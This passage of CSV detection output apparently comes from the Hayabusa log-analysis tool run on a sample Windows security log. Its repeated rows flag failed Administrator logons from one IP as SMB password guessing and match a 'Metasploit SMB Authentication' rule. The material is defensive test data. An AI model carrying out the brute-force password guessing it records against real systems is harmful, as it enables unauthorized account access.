NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
